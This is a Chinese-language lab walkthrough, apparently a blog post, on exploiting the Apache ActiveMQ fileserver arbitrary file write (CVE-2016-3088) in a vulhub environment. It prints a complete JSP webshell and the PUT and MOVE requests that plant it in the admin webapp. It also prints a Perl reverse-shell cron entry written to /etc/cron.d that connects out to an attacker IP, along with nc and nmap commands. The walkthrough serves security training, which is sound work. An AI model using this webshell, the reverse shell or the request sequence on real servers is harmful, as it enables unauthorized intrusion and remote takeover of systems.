CVE-2016-3088（ActiveMQ任意文件写入漏洞）

漏洞描述

        1、漏洞编号：CVE-2016-3088

        2、影响版本：Apache ActiveMQ 5.x~5.13.0

        在 Apache ActiveMQ 5.12.x~5.13.x 版本中，默认关闭了 fileserver 这个应用（不过，可以在conf/jetty.xml 中开启）；在 5.14.0 版本后，彻底删除了 fileserver 应用。【所以在渗透测试过程中要确定好 ActiveMQ 的版本，免去无用功】

漏洞介绍

        该漏洞出现在 fileserver 应用中，漏洞原理是 fileserver 支持写入文件（但不解析 jsp），同时支持移动文件（MOVE 请求）。所以我们只需写入一个文件，然后使用 MOVE 请求将其移动到任意位置，造成任意文件写入漏洞。

写入文件方法

• 写入 webshell
• 写入 cron 或 ssh key 等文件
• 写入 jar 或 jetty.xml 等库和配置文件

启动漏洞环境

docker-compose up -d

docker-compose ps 

访问 WEB 页面，版本在漏洞影响范围内

方法一：写入 webshell

【该方法的使用条件】

1、需要知道 ActiveMQ 的绝对路径

2、需要能登录 admin 或者 api

【分析条件】

1、ActiveMQ 的绝对路径可以通过 http://your-ip:8161/admin/test/systemProperties.jsp 页面获取，不过该页面需要登录才能访问。

2、获取用户名和密码，可以通过弱口令、暴力破解、社工等方法（不过题目已经给出了默认用户名和密码 admin/admin，这里就省去了这个步骤）

【解题思路】

进入页面

下一步，上传 webshell

需要把 webshell 上传到 fileserver，然后才能从 fileserver 转移。因为 ActiveMQ 是个 java 程序，因此需要传个 jsp webshell

直接在上图页面抓包即可，下面是刚抓到包后的样子，接下来对数据包进行修改

这是我们的 webshell 代码

<%!
class U extends ClassLoader {
U(ClassLoader c) {
super(c);
}
public Class g(byte[] b) {
return super.defineClass(b, 0, b.length);
}
}public byte[] base64Decode(String str) throws Exception {
try {
Class clazz = Class.forName("sun.misc.BASE64Decoder");
return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
} catch (Exception e) {
Class clazz = Class.forName("java.util.Base64");
Object decoder = clazz.getMethod("getDecoder").invoke(null);
return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
}
}
%>
<%
String cls = request.getParameter("passwd");
if (cls != null) {
new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
}
%>

修改成下图所示，然后发送即可得到响应（204 表示操作成功）

然后在上面基础上继续修改该包，把 PUT 改成 MOVE ，然后在下一行添加

Destination: file:///opt/activemq/webapps/admin/1.jsp

用 MOVE 方法将 webshell 移动到 admin 所在文件夹，响应 204 表示操作成功

【当然了，移动到 api 下也是可以的，我这边移动到 admin 目录下】

接下来就可以使用蚁剑进行连接了【这里用的是 kali 中的蚁剑】

不知道 kali 中怎么使用蚁剑的看这里

VMware之kali安装中国蚁剑_kali如何打开蚁剑-CSDN博客

重点是记住 admin 应用是需要登录的，所以记得一定要在连接中添加 Authorization 头。

Authorization:YWRtaW46YWRtaW4=

测试连接，连接成功

方法二：写入 ssh key

【前提条件】

1、需要运行 ActiveMQ 的用户有 root 权限

2、需要服务器开启了 ssh 服务，并且攻击机可以连接

【分析条件】

1、

发现该用户是 root 权限，条件一满足

2、可以使用 nmap 工具来探测服务器是否开启了 ssh 且可达

nmap -sV your-ip -p-

发现只开启了 8161、61616 端口且可达，没有开启 ssh 服务，所以条件二不满足，写入 ssh key 的方法行不通

方法三：写入 cron 拿反弹 shell

【前提条件】

1、需要运行 ActiveMQ 的用户有 root 权限

2、服务器开启了 cron 服务

3、运行 ActiveMQ 的用户有使用 crontab 的权限

【拓展】

1、cron 是 Linux 系统的守护进程，用于在特定时间自动执行重复任务。

2、标准 shell 是攻击者作为客户端去连接目标服务器；反弹 shell 是攻击者作为服务器，监听某端        口，而目标设备作为客户端主动连接攻击者

      应用场景：

      ①、目标机在局域网内

      ②、目标机 ip 地址是动态的

      ③、有防火墙等限制，目标机只能发请求，不能收请求

      ④、不确定目标机何时具备连接条件

【条件分析】

1、前面已经分析过了，确实是 root 权限

2、经过下列分析得到开启了 cron 服务（root 权限对该文件可读可写）

3、第三点条件默认情况是满足的，除非存在 cron.allow 或者 cron.deny 文件，但这两个文件在            vulhub 提供的漏洞环境中不存在，因此理论上可以写入 cron 拿反弹 shell

【cron.allow 文件和 cron.deny 文件】

cron.allow 和 cron.deny 是限制 crontab 命令使用的用户名单。allow 是允许使用 crontab 命令的用户，deny 是不允许使用 crontab 命令的用户。

两份文件不一定都存在，在 Linux 中，会做如下规定：

（1）如果 cron.allow 文件存在但 cron.deny 文件不存在，那么在文件中写下的用户名，允许执行 crontab 命令。

（2）如果 cron.deny 文件存在但 cron.allow 文件不存在，那么在文件中写下的用户名，不允许执行 crontab 命令。

（3）如果两份文件都存在，那么只有 allow 文件具备优先权，只能使用 allow 文件来做限定用户。

（4）如果两份文件都不存在，那么会根据相关配置文件（depending on site-dependent configuration parameters），要么只有 root 用户允许执行该命令，要么所有的用户都能执行该命令。

【解题思路】

1、上传 cron 文件到 fileserver

2、把 cron 文件从 fileserver 移动到 /etc/cron.d/

2、攻击机上开启监听并等待反弹 shell 连接

反弹shell的方法总结 - FreeBuf网络安全行业门户

【内容截取自：vulhub ActiveMQ任意文件写入漏洞 (CVE-2016-3088) - FreeBuf网络安全行业门户】

/etc/cron.d 攻略_51CTO博客_/etc/cron.hourly

反弹 shell 内容：

*/1 * * * * root /usr/bin/perl -e 'use Socket;$i="vps.ip";$p=vps.port;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
##

抓包上传

PUT /fileserver/cron.txt HTTP/1.1Host: 0.0.0.0:8161User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateAuthorization: Basic YWRtaW46YWRtaW4=Connection: closeCookie: JSESSIONID=11siqqdhx6onj9w5jslkl7jizUpgrade-Insecure-Requests: 1Content-Length: 254*/1 * * * * root /usr/bin/perl -e 'use Socket;$i="192.168.43.69";$p=7777;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'##

上传成功，移动文件到目标目录中

MOVE /fileserver/cron.txt HTTP/1.1Destination: file:///etc/cron.d/rootHost: 0.0.0.0:8161User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateAuthorization: Basic YWRtaW46YWRtaW4=Connection: closeCookie: JSESSIONID=11siqqdhx6onj9w5jslkl7jizUpgrade-Insecure-Requests: 1Content-Length: 254*/1 * * * * root /usr/bin/perl -e 'use Socket;$i="192.168.43.69";$p=7777;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'##

在终端输入

nc -l -p 7777 

输入完后等待即可

可以做一些操作

方法四：修改 jetty.xml

【前提条件】

1、需要知道 ActiceMQ 的绝对路径

2、需要有 jetty.xml 的写权限

【分析】

使用该方法主要是来突破 admin 应用和 api 应用的访问控制权限。大概就是修改 jetty.xml 文件。使 admin 和 api 应用不用登录，然后写入webshell

（通过大佬的文章还提供了另一种思路：修改 jetty-realm.properties 文件中的用户密码，不过由于 jetty.xml 中限制了用户名，所以修改 jetty-realm.properties 文件的方法还需要一个前提是知道用户名，这个方法相对上面那个麻烦）

【完整的攻击思路】

1、获取 ActiveMQ 的绝对路径

2、上传修改后的 jetty.xml 文件到 fileserver

3、转移上传的 jetty.xml 文件到 ActiveMQ 的绝对路径 /conf/jetty.xml，覆盖原本的 jetty.xml          文件，目的是绕过 admin 和 api 的登录

4、上传 webshell 到 fileserver

5、转移 webshell 到 admin 或 api 的目录下

6、连接 webshell

【目前我也没成功，也没有找到有成功的文章，都是写理论上可行，有推荐的兄弟和我说一下】